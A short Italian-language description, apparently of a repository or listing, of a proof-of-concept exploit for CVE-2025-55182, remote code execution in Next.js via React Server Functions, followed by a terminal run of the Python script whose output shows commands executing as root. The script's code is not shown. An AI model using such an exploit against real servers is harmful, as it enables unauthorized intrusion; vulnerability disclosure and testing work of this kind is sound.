
Proof-of-concept exploit per CVE-2025-55182 che consente l'esecuzione remota di codice in Next.js tramite React Server Functions. Include uno script Python che dimostra l'iniezione di comandi e restituisce l'output a livello di sistema.
RCE di Next.js tramite React Server Functions
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}